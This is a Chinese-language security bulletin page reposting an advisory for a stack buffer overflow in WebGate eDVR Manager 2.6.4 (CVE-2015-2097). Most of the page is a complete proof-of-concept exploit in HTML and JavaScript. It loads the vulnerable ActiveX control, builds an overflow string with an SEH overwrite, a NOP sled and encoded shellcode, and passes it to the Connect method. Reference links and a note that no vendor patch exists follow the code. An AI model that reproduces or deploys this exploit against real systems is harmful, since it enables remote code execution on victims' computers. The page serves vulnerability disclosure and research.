当前位置: 首页 > 服务与支持 > 产品升级公告 > 安全漏洞公告

服务与支持Support

WebGate eDVR Manager 2.6.4 Connect方法栈缓冲区溢出漏洞

     发表日期:2015-04-09 10:38:00

WebGate eDVR Manager 2.6.4 Connect方法栈缓冲区溢出漏洞(CVE-2015-2097)
CVE-ID:CVE-2015-2097
发布日期:2015-04-02
更新日期:2015-04-03
受影响系统:
Webgate eDVR Manager 2.6.4
详细信息:
 
WebGate eDVR Manager是eDVR设备管理器。
 
 
 
WebGate Embedded Standard Protocol (WESP) SDK存在多个缓冲区溢出漏洞,远程攻击者利用此漏洞可执行任意代码。此漏洞位于WESPSerialPort.WESPSerialPortCtrl.1控件中。
 
 
来源:
rgod (rgod@autistici.org)
测试方法:
警  告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!<html>
 
<!--
 
# Exploit Title: WebGate eDVR Manager Connect Method Stack Buffer Overflow
 
# Date: 01st April, 2015
 
# Exploit Author: Praveen Darshanam
 
# Vendor Homepage: http://www.webgateinc.com/wgi/eng/
 
# Software Link: http://www.webgateinc.com/wgi_htdocs/eng/dcenter/view.php?id=wgi_eng&page=1&sn1=&divpage=1&sn=off&ss=on&sc=on&select_arrange=headnum&desc=asc&no=531&category_group=4&category_product=74&category=174
 
# Tested on: Windows XP SP3 using IE8
 
# CVE : 2015-2097
 
 
 
targetFile = "C:\\WINDOWS\\system32\\WESPSDK\\WESPSerialPort.dll"
 
prototype  = "Sub Connect ( ByVal IPAddr As String ,  ByVal PortNum As Integer ,  ByVal UserID As String ,  ByVal Password As String )"
 
progid     = "WESPSERIALPORTLib.WESPSerialPortCtrl"
 
Tested on IE8
 
Author: Praveen Darshanam
 
http://blog.disects.com/
 
http://darshanams.blogspot.com/
 
P.S. Do not remove back slashes in shellcode and other variables
 
-->
 
 
 
<object classid=\'clsid:BAAA6516-267C-466D-93F5-C504EF973837\' id=\'target\'>
 
</object>
 
<script>
 
 
 
var arg1="PraveenD";
 
var arg2=1;
 
var arg3= "";
 
var arg4="PraveenD";
 
 
 
var nops = "";
 
var shellcode = "";
 
var buff2 = "";
 
 
 
for (i=0; i<1664; i++)
 
{
 
    arg3 += "B";
 
}
 
var nseh = "\\xeb\\x10PD";
 
//WESPSerialPort.dll(0x100104e7 = pop pop ret)
 
var seh = "\\xe7\\x04\\x01\\x10";
 
for (i=0;i<80; i++)
 
{
 
    nops += "\\x90";
 
}
 
shellcode = "\\x54\\x5d\\xda\\xc9\\xd9\\x75\\xf4\\x59\\x49\\x49\\x49\\x49\\x49" +
 
"\\x43\\x43\\x43\\x43\\x43\\x43\\x51\\x5a\\x56\\x54\\x58\\x33\\x30" +
 
"\\x56\\x58\\x34\\x41\\x50\\x30\\x41\\x33\\x48\\x48\\x30\\x41\\x30" +
 
"\\x30\\x41\\x42\\x41\\x41\\x42\\x54\\x41\\x41\\x51\\x32\\x41\\x42" +
 
"\\x32\\x42\\x42\\x30\\x42\\x42\\x58\\x50\\x38\\x41\\x43\\x4a\\x4a" +
 
"\\x49\\x4b\\x4c\\x5a\\x48\\x4b\\x32\\x45\\x50\\x55\\x50\\x43\\x30" +
 
"\\x53\\x50\\x4b\\x39\\x4d\\x35\\x30\\x31\\x4f\\x30\\x52\\x44\\x4c" +
 
"\\x4b\\x56\\x30\\x46\\x50\\x4c\\x4b\\x31\\x42\\x34\\x4c\\x4c\\x4b" +
 
"\\x31\\x42\\x44\\x54\\x4c\\x4b\\x32\\x52\\x47\\x58\\x54\\x4f\\x38" +
 
"\\x37\\x50\\x4a\\x37\\x56\\x46\\x51\\x4b\\x4f\\x4e\\x4c\\x57\\x4c" +
 
"\\x35\\x31\\x33\\x4c\\x33\\x32\\x46\\x4c\\x37\\x50\\x49\\x51\\x48" +
 
"\\x4f\\x34\\x4d\\x45\\x51\\x4f\\x37\\x4d\\x32\\x4a\\x52\\x36\\x32" +
 
"\\x46\\x37\\x4c\\x4b\\x36\\x32\\x32\\x30\\x4c\\x4b\\x30\\x4a\\x37" +
 
"\\x4c\\x4c\\x4b\\x30\\x4c\\x32\\x31\\x54\\x38\\x5a\\x43\\x51\\x58" +
 
"\\x33\\x31\\x4e\\x31\\x30\\x51\\x4c\\x4b\\x36\\x39\\x47\\x50\\x53" +
 
"\\x31\\x48\\x53\\x4c\\x4b\\x30\\x49\\x35\\x48\\x5a\\x43\\x36\\x5a" +
 
"\\x57\\x39\\x4c\\x4b\\x46\\x54\\x4c\\x4b\\x33\\x31\\x49\\x46\\x56" +
 
"\\x51\\x4b\\x4f\\x4e\\x4c\\x49\\x51\\x38\\x4f\\x54\\x4d\\x35\\x51" +
 
"\\x58\\x47\\x37\\x48\\x4d\\x30\\x34\\x35\\x4a\\x56\\x43\\x33\\x43" +
 
"\\x4d\\x5a\\x58\\x37\\x4b\\x43\\x4d\\x46\\x44\\x43\\x45\\x4d\\x34" +
 
"\\x56\\x38\\x4c\\x4b\\x56\\x38\\x31\\x34\\x43\\x31\\x4e\\x33\\x42" +
 
"\\x46\\x4c\\x4b\\x44\\x4c\\x30\\x4b\\x4c\\x4b\\x36\\x38\\x45\\x4c" +
 
"\\x45\\x51\\x4e\\x33\\x4c\\x4b\\x54\\x44\\x4c\\x4b\\x33\\x31\\x48" +
 
"\\x50\\x4c\\x49\\x57\\x34\\x36\\x44\\x51\\x34\\x51\\x4b\\x51\\x4b" +
 
"\\x33\\x51\\x30\\x59\\x50\\x5a\\x36\\x31\\x4b\\x4f\\x4b\\x50\\x31" +
 
"\\x4f\\x51\\x4f\\x51\\x4a\\x4c\\x4b\\x42\\x32\\x5a\\x4b\\x4c\\x4d" +
 
"\\x31\\x4d\\x53\\x5a\\x35\\x51\\x4c\\x4d\\x4c\\x45\\x58\\x32\\x43" +
 
"\\x30\\x53\\x30\\x55\\x50\\x56\\x30\\x42\\x48\\x50\\x31\\x4c\\x4b" +
 
"\\x42\\x4f\\x4d\\x57\\x4b\\x4f\\x59\\x45\\x4f\\x4b\\x5a\\x50\\x48" +
 
"\\x35\\x4f\\x52\\x30\\x56\\x53\\x58\\x4e\\x46\\x5a\\x35\\x4f\\x4d" +
 
"\\x4d\\x4d\\x4b\\x4f\\x38\\x55\\x47\\x4c\\x53\\x36\\x33\\x4c\\x45" +
 
"\\x5a\\x4b\\x30\\x4b\\x4b\\x4b\\x50\\x43\\x45\\x43\\x35\\x4f\\x4b" +
 
"\\x47\\x37\\x32\\x33\\x53\\x42\\x42\\x4f\\x42\\x4a\\x55\\x50\\x46" +
 
"\\x33\\x4b\\x4f\\x49\\x45\\x43\\x53\\x53\\x51\\x52\\x4c\\x52\\x43" +
 
"\\x36\\x4e\\x55\\x35\\x44\\x38\\x33\\x55\\x33\\x30\\x41\\x41";
 
for (i=0;i<(8000 - (arg3.length + nseh.length + seh.length + nops.length + shellcode.length)); i++)
 
{
 
    buff2 += "A";
 
}
 
 
 
fbuff = arg3 + nseh + seh + nops + shellcode + buff2;
 
target.Connect(arg1, arg2, fbuff ,arg4);
 
 
 
</script>
 
</html>
解决办法:
厂商补丁:
 
Webgate
-------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
 
 
 
http://www.webgateinc.com/wgi_htdocs/eng/dcenter/view.php?id=wgi_eng&page=1&sn1=&divpage=1&sn=off&ss
 
 
 
参考:
 
 
 
http://seclists.org/fulldisclosure/2015/Feb/90
 
http://www.zerodayinitiative.com/advisories/ZDI-15-059/
 
http://www.zerodayinitiative.com/advisories/ZDI-15-062/
 
http://www.zerodayinitiative.com/advisories/ZDI-15-068/